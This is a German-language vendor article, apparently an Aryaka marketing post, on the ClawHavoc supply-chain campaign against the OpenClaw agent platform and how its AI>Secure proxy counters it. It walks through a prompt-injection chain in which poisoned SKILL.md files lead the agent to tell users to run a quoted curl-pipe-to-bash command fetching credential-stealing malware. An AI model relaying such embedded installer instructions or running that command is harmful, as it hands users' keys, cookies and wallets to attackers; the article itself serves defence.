Ab Februar 2026 ist OpenClaw (ehemals Clawdbot und Moltbot) eine beliebte Plattform für autonome KI-Agenten. Seine „souveräne“ Architektur, die der KI direkten Zugriff auf Dateisysteme und Terminals ermöglicht, vergrößert die Angriffsfläche erheblich, was zu erhöhten Risiken führt, wie die ClawHavoc Supply-Chain-Kampagne gezeigt hat, die Tausende von Installationen einer potenziellen Gefährdung ausgesetzt hat.
Dieser Artikel gibt einen Überblick über die Schwachstellen von OpenClaw und erklärt, wie Aryaka AI>Secure eine robuste, mehrschichtige Risikominderung bietet.
OpenClaw-Sicherheitslücken und der ClawHavoc-Kontext
OpenClaw ist vor allem aufgrund von drei Faktoren anfällig:
- Zugang auf Systemebene: Agenten können Shell-Befehle ausführen und auf Anmeldedaten zugreifen.
- Nicht vertrauenswürdige Ingestion: Agenten verarbeiten Inhalte von Drittanbietern und setzen sie damit der Prompt Injection aus.
- Autonome Kommunikation: Agenten können ohne Aufsicht Daten nach außen senden.
ClawHavoc ist eine Supply-Chain-Attacke, die dieses Ökosystem ausnutzt. Im Februar 2026 entdeckten Forscher, dass etwa 12 % der ClawHub-Skills bösartig waren. Sie waren als nützliche Tools getarnt, stahlen aber in Wirklichkeit digitale Identitäten.
Wie ClawHavoc funktioniert: Die Anatomie einer Infektion
ClawHavoc ist ein zustandsabhängiger Social-Engineering-Angriff, der die Art und Weise ausnutzt, wie OpenClaw Anweisungen aufnimmt. Er folgt einer wiederholbaren, äußerst effektiven Kill Chain:
- Schritt 1: Das vergiftete Manifest (SKILL.md): Die Angreifer laden eine Fertigkeit auf ClawHub hoch. Der Kern des Angriffs ist die Datei SKILL.md. Sie enthält einen Abschnitt „Voraussetzungen“, der dem Agenten (und dem Benutzer) mitteilt, dass ein bestimmtes Skript ausgeführt werden muss, um das Tool zu „initialisieren“.
- Schritt 2: Social Engineering über LLM: Wenn Sie Ihren Agenten auffordern, die Fähigkeit zu verwenden, liest er die bösartige SKILL.md in seinem Kontext. Der LLM erzeugt dann eine hilfreich klingende Antwort: „Um diese Funktion zu aktivieren, führen Sie bitte diesen Befehl in Ihrem Terminal aus: curl -sL https://glot.io/raw/snippet | bash.“
- Schritt 3: Auslieferung der Malware-Nutzlast: Wenn der Benutzer den Befehl ausführt, lädt er eine Nutzlast der zweiten Stufe herunter – typischerweise Atomic Stealer (AMOS) oder einen Keylogger. Diese Malware durchsucht Browser-Cookies, Schlüsselbunde und die OpenClaw-Umgebungsdateien nach API-Schlüsseln und Krypto-Brieftaschen.
Verwenden Sie Aryaka AI>Secure, um ClawHavoc zu stoppen.
Als paketorientierter, KI-fähiger MITM-Proxy ist Aryaka AI>Secure fängt den Datenverkehr in jeder Phase der ClawHavoc-Angriffskette ab.
Methode 1: Blockieren des Downloads einer bösartigen Fertigkeit
Wenn ein Benutzer clawhub install ausführt, entschlüsselt AI>Secure den HTTPS-Verkehr aus der Registry.
- Der Schutz: Es sieht nicht nur eine Datei, sondern analysiert auch den Markdown-Inhalt der SKILL.md. Es nutzt die semantische Inspektion, um „giftige Anweisungen“ zu identifizieren, wie z.B. versteckte Shell-Befehle oder Links zu bekannten Snippet-Sharing-Seiten, die in der ClawHavoc-Kampagne verwendet werden.
- Das Ergebnis: Er blockiert den Download am Netzwerkrand und verhindert so, dass die bösartigen Anweisungen jemals den Speicher des Agenten erreichen.
Methode 2: Semantische Filterung der Antwort (Befehlsverteidigung)
Wenn sich bereits eine schlechte Fähigkeit auf Ihrem Rechner befindet, bietet AI>Secure eine zweite Verteidigungsschicht, indem es die Ausgabe des LLM überprüft.
- Der Schutz: Wenn der LLM den Benutzer auffordert: „Führen Sie dieses Skript aus, um das Tool zu aktivieren“, erkennt die semantische Engine von AI>Secure dies als „Installer-Betrug“. Sie erkennt, dass die KI manipuliert wurde, um einen Menschen zu einer gefährlichen Aktion zu verleiten.
- Das Ergebnis: Der Proxy löscht den Befehl aus dem Chat-Stream oder blockiert die Nachricht vollständig und ersetzt sie durch eine Sicherheitswarnung auf der Benutzeroberfläche.
Methode 3: Proaktive URL-Filterung & SWG (Payload-Verteidigung)
Wenn der Benutzer versucht, manuell einen bösartigen curl-Befehl auszuführen oder eine „vorausgesetzte“ ZIP-Datei herunterzuladen, greift die Secure Web Gateway (SWG)-Funktion von AI>Secure ein.
- Der Schutz: AI>Secure nutzt einen URL Intelligence Feed in Echtzeit, um Phishing-Domains und Malware-Hosting-Infrastrukturen zu verfolgen.
- Das Ergebnis: Wenn der Agent oder Benutzer versucht, die spezifische URL zu erreichen, die die Malware-Nutzlast enthält (wie glot.io oder webhook.site), identifiziert der Proxy das Ziel als „bösartig“ oder „hohes Risiko“ und bricht die Anfrage sofort ab. Dadurch wird verhindert, dass die eigentliche Malware jemals abgerufen wird.
Methode 4: Laufzeit-Tool & Daten-Sperrung
Wenn es der Malware gelingt, sich auszuführen, fungiert AI>Secure als letzter Torwächter für Ihre Daten.
- Der Schutz: Es versteht die MCP-Aufrufe (Model Context Protocol). Wenn ein infizierter Agent versucht, einen Shell-Befehl auszuführen, um Daten zu exfiltrieren, identifiziert AI>Secure das anomale Ziel.
- Das Ergebnis: Seine Next-Gen DLP (Data Loss Prevention) scannt alle ausgehenden Daten auf „Secrets“ (API-Schlüssel, SSH-Header). Wenn es feststellt, dass Ihre privaten Anmeldeinformationen das Netzwerk verlassen, wird die Sitzung beendet und das Sicherheitsteam alarmiert.
Fazit
Die ClawHavoc-Krise beweist, dass für autonome Agenten die Eingabeaufforderung und das Fähigkeitsmanifest die neuen Grenzen sind. Indem Sie einen KI-zentrierten Proxy wie Aryaka AI>Secure einsetzen, stellen Sie sicher, dass Ihr OpenClaw-Agent ein Werkzeug für die Produktivität bleibt und kein Einfallstor für Angreifer wird.